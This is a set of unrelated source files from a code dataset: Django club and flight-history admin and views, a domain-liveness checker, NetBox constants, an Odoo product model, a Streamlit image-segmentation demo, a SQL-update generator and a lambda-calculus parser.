allow_registration.short_description = _('Allow registration for selected clubs')\n\n def disallow_registration(self, request, queryset):\n Club.objects.filter(id__in=[reg['id'] for reg in queryset.values('id')]).update(reg_active = False)\n self.message_user(request, _('Registration was disallowed for selected clubs.'))\n disallow_registration.short_description = _('Disallow registration for selected clubs')\n\n def merge(self, request, queryset):\n class MergeForm(forms.Form):\n target = forms.ModelChoiceField(\n label=_('Target club'),\n help_text=_('All information will be merged into selected club.'),\n queryset=queryset,\n )\n if request.POST.get('post', 'no') == 'yes':\n form = MergeForm(request.POST)\n if form.is_valid():\n target = form.cleaned_data['target']\n clubs = [ club for club in queryset.all() if club != target ]\n for club in clubs:\n # merge groups\n for group in club.all_groups:\n target.groups.add(group)\n # merge age_groups\n for age_group in club.all_age_groups:\n target.age_groups.add(age_group)\n # merge leaders\n for leader in club.all_leaders:\n target.leaders.add(leader)\n # merge times\n for time in club.all_times:\n time.club = target\n time.save()\n # merge questions\n for question in club.all_questions:\n target.questions.add(question)\n # merge registrations\n for registration in club.all_registrations:\n registration.club = target\n registration.save()\n # merge journal_entries\n for entry in club.all_journal_entries:\n entry.club = target\n entry.save()\n club.delete()\n self.message_user(request, _('Selected clubs were merged into club {}.').format(club))\n return\n else:\n form = MergeForm()\n return render_to_response('domecek/admin/club_merge.html', {\n 'title': _('Select target club for merge'),\n 'queryset': queryset,\n 'opts': self.model._meta,\n 'form': form,\n 'action_checkbox_name': helpers.ACTION_CHECKBOX_NAME,\n }, context_instance=RequestContext(request))\n merge.short_description = _('Merge selected clubs into one')\n\n def get_registrations_link(self, obj):\n icon = False\n if obj.registrations_count == 0:\n title = _('There are no registrations for this club.')\n elif obj.min_count is not None and obj.registrations_count < obj.min_count:\n title = _('The number of registrations is lower than {}.').format(obj.min_count)\n elif obj.max_count is not None and obj.registrations_count > obj.max_count:\n title = _('The number of registrations is greater than {}.').format(obj.max_count)\n else:\n icon = True\n title = ''\n return '{icon} {count}'.format(\n url = reverse('admin:{}_{}_changelist'.format(\n ClubRegistration._meta.app_label,\n ClubRegistration._meta.model_name,\n )) + '?club={}'.format(obj.id),\n title = title,\n icon = _boolean_icon(icon),\n count = obj.registrations_count,\n )\n get_registrations_link.short_description = _('registrations')\n get_registrations_link.admin_order_field = 'registrations_count'\n get_registrations_link.allow_tags = True\n\n def get_journal_link(self, obj):\n return '{journal}'.format(\n url = reverse('admin:domecek_club_journal', args=[obj.id]),\n title = _('printable club journal'),\n journal = _('journal'),\n )\n get_journal_link.short_description = _('journal')\n get_journal_link.allow_tags = True\n\n def get_urls(self):\n urls = super(ClubAdmin, self).get_urls()\n return [\n urls_url(r'(?P\\d+)/journal/$', self.admin_site.admin_view(self.journal), name='domecek_club_journal'),\n ] + urls\n\n def journal(self, request, club_id):\n club = get_object_or_404(Club, id=club_id)\n return 
render_to_response('domecek/club_journal.html', {\n 'club': club,\n 'admin': True,\n }, context_instance=RequestContext(request))\n\n def icon(self, obj):\n return obj.photo and '<a href=\"{admin_url}\"><img src=\"{icon_url}\" alt=\"\"/></a>'.format(\n admin_url = obj.photo.get_admin_url_path(),\n icon_url = obj.photo.icons['48'],\n ) or ''\n icon.allow_tags = True\n icon.short_description = _('photo')\n\n\n\nclass ClubRegistrationAdmin(AdminExportMixin, admin.ModelAdmin):\n form = ClubRegistrationAdminForm\n list_display = (\n 'id', 'get_download_tag', 'club', 'participant', 'parents_link',\n 'discount', 'get_payments_partial_balance_html', 'get_payments_total_balance_html', 'get_club_payments', 'created',\n 'cancel_request', 'canceled',\n )\n list_export = (\n 'id', 'created', 'club', 'age_group',\n 'participant__first_name', 'participant__last_name', 'participant__birth_num',\n 'participant__email', 'participant__phone', 'school_name', 'school_class',\n 'participant__street', 'participant__city', 'participant__postal_code', 'citizenship', 'insurance', 'health',\n 'parents', 'parent_emails',\n 'get_payments_partial_balance', 'get_payments_total_balance',\n )\n list_filter = (\n ('club__school_year', SchoolYearListFilter),\n ('club', ClubListFilter),\n ('club__leaders', LeaderListFilter),\n )\n actions = ('send_mail',)\n search_fields = (\n 'participant__first_name', 'participant__last_name',\n 'participant__birth_num', 'participant__email',\n 'participant__parents__first_name', 'participant__parents__last_name', 'participant__parents__email',\n 'school__name', 'club__name',\n )\n ordering = ('-cancel_request', '-created')\n raw_id_fields = ('club', 'participant')\n\n def has_add_permission(self, request):\n return False\n\n def get_fields(self, request, obj=None):\n fields = super(ClubRegistrationAdmin, self).get_fields(request, obj)\n if obj:\n fields += ['q_'+q.name for q in obj.club.all_questions]\n return fields\n\n def parents(self, obj):\n return comma_separated(obj.participant.all_parents)\n parents.short_description = _('parents')\n\n def parent_emails(self, obj):\n return ', '.join(\n '{} <{}>'.format(p.full_name, p.email)\n for p in obj.participant.all_parents if p.email\n )\n parent_emails.short_description = _('parent emails')\n\n def school_name(self, obj):\n return obj.school_name\n school_name.short_description = _('school')\n\n def get_download_tag(self, obj):\n return '<a href=\"{}\">PDF</a>'.format(reverse('admin:domecek_clubregistration_pdf', args=(obj.id,)))\n get_download_tag.short_description = _('download')\n get_download_tag.allow_tags = True\n\n def get_fullname(self, obj):\n return '{} {}'.format(obj.participant.first_name, obj.participant.last_name)\n get_fullname.short_description = _('full name')\n\n @cached_property\n def parents_url(self):\n return reverse('admin:domecek_parent_changelist')\n\n def parents_link(self, obj):\n return '<a href=\"{url}?participant={participant}\">{names}</a>'.format(\n url = self.parents_url,\n participant = obj.participant.id,\n names = ', '.join(smart_text(parent) for parent in obj.participant.all_parents),\n )\n parents_link.allow_tags = True\n parents_link.short_description = _('parents')\n\n def get_club_payments(self, obj):\n html = []\n price = obj.club.price\n for period in obj.get_period_payment_statuses():\n html.append(format_html('<a href=\"{href}\" title=\"{title}\" style=\"color: {color}\">{period}: {amount}</a>',\n period = period.period.name,\n color = period.status.color,\n href = reverse('admin:domecek_clubpayment_changelist') + '?registration={}'.format(obj.id),\n title = period.status.title,\n amount = currency(period.status.paid),\n ))\n return mark_safe('<br/>
'.join(html) + format_html('   ',\n href = reverse('admin:domecek_clubpayment_add') + '?registration={}'.format(obj.id),\n title = _('add payment'),\n ))\n get_club_payments.short_description = _('club payments')\n\n def get_payments_partial_balance(self, obj):\n return obj.get_payment_statuses().partial.balance\n get_payments_partial_balance.short_description = _('actual balance')\n\n def get_payments_total_balance(self, obj):\n return obj.get_payment_statuses().total.balance\n get_payments_total_balance.short_description = _('total balance')\n\n def get_payments_partial_balance_html(self, obj):\n status = obj.get_payment_statuses().partial\n return '{balance}'.format(\n color = status.color,\n balance = currency(status.balance),\n title = status.title,\n )\n get_payments_partial_balance_html.allow_tags = True\n get_payments_partial_balance_html.short_description = _('actual balance')\n\n def get_payments_total_balance_html(self, obj):\n status = obj.get_payment_statuses().total\n return '{balance}'.format(\n color = status.color,\n balance = currency(status.balance),\n title = status.title,\n )\n get_payments_total_balance_html.allow_tags = True\n get_payments_total_balance_html.short_description = _('total balance')\n\n def get_urls(self):\n urls = super(ClubRegistrationAdmin, self).get_urls()\n return [\n urls_url(r'(?P\\d+).pdf$', self.admin_site.admin_view(self.pdf), name='domecek_clubregistration_pdf'),\n ] + urls\n\n def pdf(self, request, reg_id):\n from ..views.clubs import ClubRegistrationPdfView\n return ClubRegistrationPdfView.as_view()(request, pk=reg_id)\n\n def send_mail(self, request, queryset):\n for registration in queryset.all():\n recipients = registration.all_recipients\n if recipients:\n registration.send_mail()\n self.message_user(\n request,\n _('Registration {registration} ({id}) successfully sent to {recipients}.').format(\n registration = registration,\n id = registration.id,\n recipients = comma_separated(recipients),\n ),\n )\n else:\n self.message_user(\n request,\n _('Registration {registration} ({id}) has no recipients.').format(\n registration = registration,\n id = registration.id,\n ),\n )\n send_mail.short_description = _('Send selected registrations by email')\n\n\n\nclass ClubPaymentAdmin(AdminExportMixin, admin.ModelAdmin):\n list_display = ('registration', 'date', 'amount')\n list_filter = (\n ('registration__club__school_year', SchoolYearListFilter),\n ('registration__club', ClubListFilter),\n )\n search_fields = ('registration__club__name', 'registration__participant__first_name', 'registration__participant__last_name',\n 'registration__participant__birth_num')\n date_hierarchy = 'date'\n ordering = ('-date',)\n raw_id_fields = ('registration',)\n\n\n\nclass ClubJournalLeaderEntryAdmin(AdminExportMixin, admin.ModelAdmin):\n form = ClubJournalLeaderEntryAdminForm\n list_display = ('timesheet', 'date', 'start', 'end', 'duration', 'club')\n list_filter = (('timesheet__leader', LeaderListFilter),)\n ordering = ('-club_entry__date', '-start')\n\n def has_add_permission(self, request):\n return False\n\n def has_delete_permission(self, request, obj=None):\n if obj and obj.timesheet.submitted:\n return False\n return super(ClubJournalLeaderEntryAdmin, self).has_delete_permission(request, obj)\n\n def get_readonly_fields(self, request, obj=None):\n if obj and obj.timesheet.submitted:\n return ('start', 'end')\n return self.readonly_fields\n\n\n\nclass ClubJournalLeaderEntryInlineAdmin(admin.TabularInline):\n class form(forms.ModelForm):\n class Meta:\n 
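# an empty fields list keeps this inline form free of editable inputs; the visible columns come from readonly_fields\n 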
model = ClubJournalLeaderEntry\n fields = []\n model = ClubJournalLeaderEntry\n ordering = ('club_entry__date', 'start')\n readonly_fields = ('date', 'start', 'end', 'edit_link')\n\n def has_add_permission(self, request):\n return False\n\n def has_delete_permission(self, request, obj=None):\n if obj:\n # obj may be Timesheet or ClubJournalEntry\n # this inline is used in both ClubJournalEntryAdmin and TimesheetAdmin\n try:\n entries = obj.leader_entries\n except AttributeError:\n entries = obj.club_entries\n if entries.filter(timesheet__submitted=True).exists():\n return False\n return super(ClubJournalLeaderEntryInlineAdmin, self).has_delete_permission(request, obj)\n\n def edit_link(self, obj):\n return '{edit}'.format(\n url = reverse('admin:domecek_clubjournalleaderentry_change', args=[obj.id]),\n title = _('update entry'),\n edit = _('edit'),\n )\n edit_link.short_description = ''\n edit_link.allow_tags = True\n\nclass ClubJournalEntryAdmin(AdminExportMixin, admin.ModelAdmin):\n form = ClubJournalEntryAdminForm\n date_hierarchy = 'date'\n list_display = ('club_name', 'period_name', 'date', 'start', 'end', 'duration', 'agenda_html')\n list_filter = (\n ('period__club__school_year', SchoolYearListFilter),\n ('period__club', ClubListFilter),\n )\n filter_horizontal = ('participants',)\n inlines = (ClubJournalLeaderEntryInlineAdmin,)\n ordering = ('-date', '-start')\n readonly_fields = ('club_name', 'period_name', 'date',)\n\n def has_add_permission(self, request):\n return False\n\n def has_delete_permission(self, request, obj=None):\n if obj:\n if obj.leader_entries.filter(timesheet__submitted=True).exists():\n return False\n else:\n return super(ClubJournalEntryAdmin, self).has_delete_permission(request, obj)\n return False\n\n def get_actions(self, request):\n actions = super(ClubJournalEntryAdmin, self).get_actions(request)\n if 'delete_selected' in actions:\n del(actions['delete_selected'])\n return actions\n\n def club_name(self, obj):\n return obj.period.club.name\n club_name.short_description = _('club')\n club_name.admin_order_field = 'period__club__name'\n\n def period_name(self, obj):\n return obj.period.name\n period_name.short_description = _('period')\n period_name.admin_order_field = 'period__name'\n\n def agenda_html(self, obj):\n return obj.agenda\n agenda_html.short_description = _('agenda')\n agenda_html.admin_order_field = 'agenda'\n agenda_html.allow_tags = True\n\n\n","sub_path":"domecek/admin/clubs.py","file_name":"clubs.py","file_ext":"py","file_size_in_byte":20269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"349414902","text":"from django.shortcuts import render, redirect, get_object_or_404\nimport json\n# Create your views here.\nfrom django.urls import reverse_lazy,reverse\nfrom django.http import HttpResponse, JsonResponse\nfrom projpad.models import *\nfrom django.db.models import Sum\nfrom appprincipal.forms import *\nfrom .forms import *\nfrom projpad.models import *\nfrom django.core import serializers\n#from chartit import DataPool, Chart, PivotDataPool, PivotChart\n\ndef index(request):\n return render(request, 'index.html')\n\n\ndef Hist_2015_1(request):\n item = Hist_voo2015.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Janeiro',\n }\n return render(request, 'hist2015.html', context)\n\n\ndef Hist_2015_2(request):\n item = Hist_voo2015_2.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Fevereiro',\n }\n return render(request, 'hist2015.html', 
context)\n\n\ndef Hist_2015_3(request):\n item = Hist_voo2015_3.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Março',\n }\n return render(request, 'hist2015.html', context)\n\ndef Hist_2015_4(request):\n item = Hist_voo2015_4.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Abril',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_5(request):\n item = Hist_voo2015_5.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Maio',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_6(request):\n item = Hist_voo2015_6.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 junho',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_7(request):\n item = Hist_voo2015_7.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Julho',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_8(request):\n item = Hist_voo2015_8.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Agosto',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_9(request):\n item = Hist_voo2015_9.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Setembro',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_10(request):\n item = Hist_voo2015_10.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Outubro',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_11(request):\n item = Hist_voo2015_11.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Novembro',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_12(request):\n item = Hist_voo2015_12.objects.all() \n context = {\n 'item': item,\n 'header': 'Historico 2015 Dezembro',\n }\n return render(request, 'hist2015.html', context) \n\ndef historico(request):\n queryset = Hist_voo2015.objects.all()\n sigla = [obj.sigla for obj in queryset]\n situacao = [obj.situacao for obj in queryset]\n\n context = {\n 'sigla': json.dumps(sigla),\n 'situacao': json.dumps(situacao),\n }\n return render(request, 'historico.html', context)\n\ndef dashboard_with_pivot(request):\n return render(request, 'dashboard_with_pivot.html', {})\n\n\ndef pivot_data(request):\n dataset = Order.objects.all()\n data = serializers.serialize('json', dataset)\n return JsonResponse(data, safe=False)\n\n\n\ndef Hist_2016_1(request):\n item = Hist_voo2016.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2016 Janeiro',\n }\n return render(request, 'hist2016.html', context)\n\n\ndef Hist_2016_2(request):\n context = {\n 'header': 'Historico 2016 Fevereiro',\n }\n return render(request, 'hist2016.html', context)\n\ndef Hist_2016_3(request):\n context = {\n 'header': 'Historico 2016 Março',\n }\n return render(request, 'hist2016.html', context)\n\ndef Hist_2017_1(request):\n item = Hist_voo2017.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2017 Janeiro',\n }\n return render(request, 'hist2017.html', context)\n\n","sub_path":"appprincipal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"436930556","text":"import re\nimport requests,os\nfrom termcolor import *\nfrom multiprocessing import Pool,Manager\ndef check(i,q):\n try:\n requests.get(\"http://\"+i,timeout=5)\n except:\n try:\n 
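# plain HTTP failed, so retry the same host over HTTPS before declaring it dead\n 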
requests.get(\"https://\"+i,timeout=5)\n except:\n print(colored(i+\" is not alive\",\"red\"))\n return\n q.append(i)\n print(colored(i+\" is alive\",\"green\"))\n # alive.append(i)\ndef check_domain_alive(file):\n with open(file,\"r\") as f:\n misc=f.read()\n res=re.sub(r'(\\d{1,3}\\.){3}\\d{1,3}',\"\",misc)\n res=res.replace(\" \",\"\\n\").split(\"\\n\")\n for i in range(len(res)):\n res[i]=res[i].strip()\n while True:\n try:\n res.remove(\"\")\n except:\n break\n q= Manager().list()\n num=os.cpu_count()\n while res:\n \n \n p = Pool(num)#最多同时执行4个进程\n\n for i in range(num):\n try:\n tmp=res.pop()\n except:\n break\n p.apply_async(check, args=(tmp,q,))\n p.close()\n p.join()\n f=open(\"alive_\"+file,\"w\")\n while q:\n tmp=q.pop()\n print(tmp)\n f.write(tmp+\"\\n\")\n f.close()\n\nif __name__=='__main__':\n check_domain_alive(input(\"filename:\"))\n \n\n","sub_path":"2020/butian_fucker/域名存活检测/check_domain_alive.py","file_name":"check_domain_alive.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"650602096","text":"from __future__ import unicode_literals\n\n\n# Models which support custom fields\nCUSTOMFIELD_MODELS = (\n 'provider', 'circuit', # Circuits\n 'site', 'rack', 'devicetype', 'device', # DCIM\n 'aggregate', 'prefix', 'ipaddress', 'vlan', 'vrf', 'service', # IPAM\n 'secret', # Secrets\n 'tenant', # Tenancy\n 'cluster', 'virtualmachine', # Virtualization\n)\n\n# Custom field types\nCF_TYPE_TEXT = 100\nCF_TYPE_INTEGER = 200\nCF_TYPE_BOOLEAN = 300\nCF_TYPE_DATE = 400\nCF_TYPE_URL = 500\nCF_TYPE_SELECT = 600\nCUSTOMFIELD_TYPE_CHOICES = (\n (CF_TYPE_TEXT, 'Text'),\n (CF_TYPE_INTEGER, 'Integer'),\n (CF_TYPE_BOOLEAN, 'Boolean (true/false)'),\n (CF_TYPE_DATE, 'Date'),\n (CF_TYPE_URL, 'URL'),\n (CF_TYPE_SELECT, 'Selection'),\n)\n\n# Custom field filter logic choices\nCF_FILTER_DISABLED = 0\nCF_FILTER_LOOSE = 1\nCF_FILTER_EXACT = 2\nCF_FILTER_CHOICES = (\n (CF_FILTER_DISABLED, 'Disabled'),\n (CF_FILTER_LOOSE, 'Loose'),\n (CF_FILTER_EXACT, 'Exact'),\n)\n\n# Graph types\nGRAPH_TYPE_INTERFACE = 100\nGRAPH_TYPE_PROVIDER = 200\nGRAPH_TYPE_SITE = 300\nGRAPH_TYPE_CHOICES = (\n (GRAPH_TYPE_INTERFACE, 'Interface'),\n (GRAPH_TYPE_PROVIDER, 'Provider'),\n (GRAPH_TYPE_SITE, 'Site'),\n)\n\n# Models which support export templates\nEXPORTTEMPLATE_MODELS = [\n 'provider', 'circuit', # Circuits\n 'site', 'region', 'rack', 'rackgroup', 'manufacturer', 'devicetype', 'device', # DCIM\n 'consoleport', 'powerport', 'interfaceconnection', 'virtualchassis', # DCIM\n 'aggregate', 'prefix', 'ipaddress', 'vlan', 'vrf', 'service', # IPAM\n 'secret', # Secrets\n 'tenant', # Tenancy\n 'cluster', 'virtualmachine', # Virtualization\n]\n\n# Topology map types\nTOPOLOGYMAP_TYPE_NETWORK = 1\nTOPOLOGYMAP_TYPE_CONSOLE = 2\nTOPOLOGYMAP_TYPE_POWER = 3\nTOPOLOGYMAP_TYPE_CHOICES = (\n (TOPOLOGYMAP_TYPE_NETWORK, 'Network'),\n (TOPOLOGYMAP_TYPE_CONSOLE, 'Console'),\n (TOPOLOGYMAP_TYPE_POWER, 'Power'),\n)\n\n# Change log actions\nOBJECTCHANGE_ACTION_CREATE = 1\nOBJECTCHANGE_ACTION_UPDATE = 2\nOBJECTCHANGE_ACTION_DELETE = 3\nOBJECTCHANGE_ACTION_CHOICES = (\n (OBJECTCHANGE_ACTION_CREATE, 'Created'),\n (OBJECTCHANGE_ACTION_UPDATE, 'Updated'),\n (OBJECTCHANGE_ACTION_DELETE, 'Deleted'),\n)\n\n# User action types\nACTION_CREATE = 1\nACTION_IMPORT = 2\nACTION_EDIT = 3\nACTION_BULK_EDIT = 4\nACTION_DELETE = 5\nACTION_BULK_DELETE = 6\nACTION_BULK_CREATE = 7\nACTION_CHOICES = (\n (ACTION_CREATE, 'created'),\n (ACTION_BULK_CREATE, 'bulk 
created'),\n    (ACTION_IMPORT, 'imported'),\n    (ACTION_EDIT, 'modified'),\n    (ACTION_BULK_EDIT, 'bulk edited'),\n    (ACTION_DELETE, 'deleted'),\n    (ACTION_BULK_DELETE, 'bulk deleted'),\n)\n\n# Report logging levels\nLOG_DEFAULT = 0\nLOG_SUCCESS = 10\nLOG_INFO = 20\nLOG_WARNING = 30\nLOG_FAILURE = 40\nLOG_LEVEL_CODES = {\n    LOG_DEFAULT: 'default',\n    LOG_SUCCESS: 'success',\n    LOG_INFO: 'info',\n    LOG_WARNING: 'warning',\n    LOG_FAILURE: 'failure',\n}\n\n# Webhook content types\nWEBHOOK_CT_JSON = 1\nWEBHOOK_CT_X_WWW_FORM_ENCODED = 2\nWEBHOOK_CT_CHOICES = (\n    (WEBHOOK_CT_JSON, 'application/json'),\n    (WEBHOOK_CT_X_WWW_FORM_ENCODED, 'application/x-www-form-urlencoded'),\n)\n\n# Models which support registered webhooks\nWEBHOOK_MODELS = (\n    'provider', 'circuit',                                  # Circuits\n    'site', 'rack', 'devicetype', 'device', 'virtualchassis',  # DCIM\n    'consoleport', 'consoleserverport', 'powerport', 'poweroutlet',\n    'interface', 'devicebay', 'inventoryitem',\n    'aggregate', 'prefix', 'ipaddress', 'vlan', 'vrf', 'service',  # IPAM\n    'secret',                                               # Secrets\n    'tenant',                                               # Tenancy\n    'cluster', 'virtualmachine',                            # Virtualization\n)\n","sub_path":"netbox/extras/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"404472665","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\nfrom odoo import models, fields, api, exceptions\nimport datetime\nimport suds.client\nimport json\n\n\nclass ProductCategory(models.Model):\n    _inherit = 'product.category'\n\n    code = fields.Char('Code')\n\n    @api.multi\n    def name_get(self):\n        return [(record.id, \"%s:%s\" % (record.code, record.name)) for record in self]\n\n\nclass Product(models.Model):\n    _inherit = 'product.template'\n\n    @api.model\n    def create(self, vals):\n        res = super(Product, self).create(vals)\n        if res:\n            if 'default_code' not in vals and not res.default_code:\n                if res.categ_id:\n                    if res.categ_id.code:\n                        default_code = self.env['ir.sequence'].get_next_code_info_if_no_create('product', res.categ_id.code, '', 7)\n                        res.default_code = default_code\n                    else:\n                        raise exceptions.Warning('The product category has no code configured; please configure one and retry!')\n            elif 'default_code' in vals:\n                res.default_code = vals['default_code']\n        return res\n","sub_path":"e2yun_addons/odoo12/e2yun_getech_sale_order_extends/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"406771799","text":"import streamlit as st\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nfrom patch_inference import get_prediction, get_model\nimport time\n# Call get_model in a cached manner before proceeding to the prediction\n\n# get_model()\nst.title('Image Segmentation App')\n\n\n\"## Upload a Satellite Image\"\nuploaded_file = st.file_uploader(\"Choose an image..\", \n                                 type = [\"jpg\", \"jpeg\", \"png\"])\n\n# Pass the path / virtual path of the image here\n\n\n# mask, damage = get_prediction(uploaded_file)\n# if mask and damage:\n#     st.image([mask, damage], \n#              caption = [\"Building Mask Prediction\", \"Flood Damage Mask Prediction\"])\n\n############# Testing code ################### \nif uploaded_file:\n    with st.spinner(\"Prediction in progress...\"):\n        # Change this spinner to run until prediction task is completed\n        time.sleep(5)\n    st.balloons()\n    st.success(\"Prediction Completed\")\n    \n    \n    \"# Given Satellite Image: \"\n    
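# --- Editor's sketch: the comment above asks for get_model() to be called "in a
# cached manner". With a recent Streamlit this is typically done via
# st.cache_resource, so the model is loaded once per process and reused across
# script reruns (older releases used @st.cache instead); a minimal sketch:
import streamlit as st
from patch_inference import get_model

@st.cache_resource
def load_model():
    # Runs only on the first call; later reruns receive the cached object.
    return get_model()

# model = load_model()  # call this before get_prediction()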
st.image(uploaded_file, width = 600)\n \"# Output:\"\n st.image([\"image1.jpeg\", \"image2.jpg\"],\n caption = [\"Building Mask Prediction\", \"Flood Damage Mask Prediction\"])","sub_path":"streamlit-app/first_app.py","file_name":"first_app.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"138057980","text":"#!/usr/bin/env python\n\n# Author: Venkata chandrasekhar Nainala \n# Version: 0.1.0\n# Email: mailcs76@gmail.com / venkata@ebi.ac.uk\n# Date: 19 May 2016\n\n\"\"\" \n Dependencies:\n Python 2.7\n\"\"\"\nimport sys\nimport argparse\nimport utils\nimport logging\nimport os\nimport time\nimport json\nimport subprocess\nfrom random import randint\n\ndestinationDirectory = \"\"\nworkingDirectory = \"\"\nftp = \"\"\n\nglobalReport = {}\n\nclass readable_dir(argparse.Action):\n def __call__(self,parser, namespace, values, option_string=None):\n prospective_dir=values\n if not os.path.isdir(prospective_dir):\n raise argparse.ArgumentTypeError(\"readable_dir:{0} is not a valid path\".format(prospective_dir))\n if os.access(prospective_dir, os.R_OK):\n setattr(namespace,self.dest,prospective_dir)\n else:\n raise argparse.ArgumentTypeError(\"readable_dir:{0} is not a readable dir\".format(prospective_dir))\n\ndef main(arguments):\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('-l', '--launch_directory', action=readable_dir, default = \"\" )\n parser.add_argument('-f', '--ftp', action=readable_dir, default=\"/ebi/ftp/pub/databases/metabolights/compounds/\", help=\"FTP directory\")\n args = parser.parse_args(arguments)\n global destinationDirectory\n global ftp\n\n workingDirectory = args.launch_directory\n ftp = args.ftp\n\n if(workingDirectory == \"\"):\n workingDirectory = os.getcwd();\n\n # log file configuration\n st = utils.getDateAndTime();\n randomInt = str(randint(1, 1000))\n logDirectory = workingDirectory + \"/logs/exporter_\" + st \n if not os.path.exists(logDirectory):\n os.makedirs(logDirectory)\n logging.basicConfig(filename= logDirectory + \"/log_\" +randomInt +\".log\",level=logging.DEBUG)\n utils.init(logging)\n logging.info(\"-----------------------------------------------\")\n logging.info('# Run started -' + utils.getDateAndTime())\n\n metabolightsFlagsJSONFile = ftp + \"ml_flags.json\"\n with open(metabolightsFlagsJSONFile) as flags_file:\n metabolightsFlagsData = json.load(flags_file)\n\n query = \"\";\n for metabolite in metabolightsFlagsData:\n has_species = int (str(metabolightsFlagsData[metabolite][\"flags\"][\"hasSpecies\"]).lower() == \"true\" )\n has_pathways = int (str(metabolightsFlagsData[metabolite][\"flags\"][\"hasPathways\"]).lower() == \"true\" )\n has_reactions = int (str(metabolightsFlagsData[metabolite][\"flags\"][\"hasReactions\"]).lower() == \"true\" )\n has_nmr = int (str(metabolightsFlagsData[metabolite][\"flags\"][\"hasNMR\"]).lower() == \"true\" )\n has_ms = int (str(metabolightsFlagsData[metabolite][\"flags\"][\"hasMS\"]).lower() == \"true\" )\n has_literature = int (str(metabolightsFlagsData[metabolite][\"flags\"][\"hasLiterature\"]).lower() == \"true\" )\n query += \"update mmimtbldev.isatab.ref_metabolite set has_species = \"+str(has_species)+\", has_pathways = \"+str(has_pathways)+\", has_reactions = \"+str(has_reactions)+\", has_nmr= \"+str(has_nmr)+\", has_ms= \"+str(has_ms)+\", has_literature= \"+str(has_literature)+\" where acc = '\" + metabolite.strip() + 
\"';\" + \"\\n\"\n\n file = open(workingDirectory + \"/query.txt\",\"w\") \n file.write(query) \n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv[1:]))","sub_path":"MetCompoundBot/GenerateSQLUpdate.py","file_name":"GenerateSQLUpdate.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"236523717","text":"class Variable:\n\n def __init__(self, name):\n self.name = name\n self.type = 'var'\n\n def __str__(self):\n return str(self.name)\n\n def __repr__(self):\n return str(self)\n\n\nclass Abstraction:\n\n def __init__(self, variables, body):\n self.variables = variables\n self.body = body\n self.type = 'lambda'\n\n def __str__(self):\n string = '(λ'\n for var in self.variables:\n string += str(var)\n string += '.' + str(self.body) + ')'\n return string\n\n def __repr__(self):\n return str(self)\n\n def __call__(self, other):\n var = self.variables[0]\n body = self.body.replace(var, str(other))\n if len(self.variables) == 1:\n return choice(body)\n else:\n return Abstraction(self.variables[1:], body)\n\n\nclass Expression:\n\n def __init__(self, expression):\n self.expression = expression\n self.reduced = False\n self.type = 'expression'\n\n def __str__(self):\n string = ''\n for item in self.expression:\n string += str(item)\n return string\n\n def __repr__(self):\n return str(self)\n\n def reduce(self):\n result = Expression(reduce(self.expression))\n return expression(str(result))\n\n\ndef variable(string):\n string = remove_outer_brackets(string).replace('\\\\', 'λ')\n\n # Variables can only be 1 character\n assert len(string) == 1\n\n # Variables cannot contain keysymbols\n assert string not in 'λ.()'\n\n return Variable(string)\n\n\ndef abstraction(string):\n string = remove_outer_brackets(string).replace('\\\\', 'λ')\n\n # Abstraction must start with λ\n assert string[0] == 'λ'\n\n # Variables before dot, body after dot\n dot_index = string.index('.')\n variables = string[1:dot_index]\n body = string[dot_index+1:]\n\n # Must be >= 1 variables\n assert len(variables) >= 1\n\n # Variables must be legal\n for var in variables:\n assert valid_variable(var)\n\n # Body must be legal expression\n assert valid_expression(body)\n\n return Abstraction(variables, body)\n\n\ndef expression(string):\n string = remove_outer_brackets(string).replace('\\\\', 'λ')\n sequence = []\n i = 0\n\n while i < len(string):\n char = string[i]\n\n # Abstraction\n if char == 'λ':\n sequence.append(abstraction(string[i:]))\n i = len(string)\n\n # Variable\n elif valid_variable(char):\n sequence.append(variable(char))\n i += 1\n\n # Subexpression\n elif char == '(':\n j = partner_bracket(i, string)\n sequence.append(choice(string[i+1:j]))\n i = j + 1\n\n return Expression(sequence)\n\n\ndef 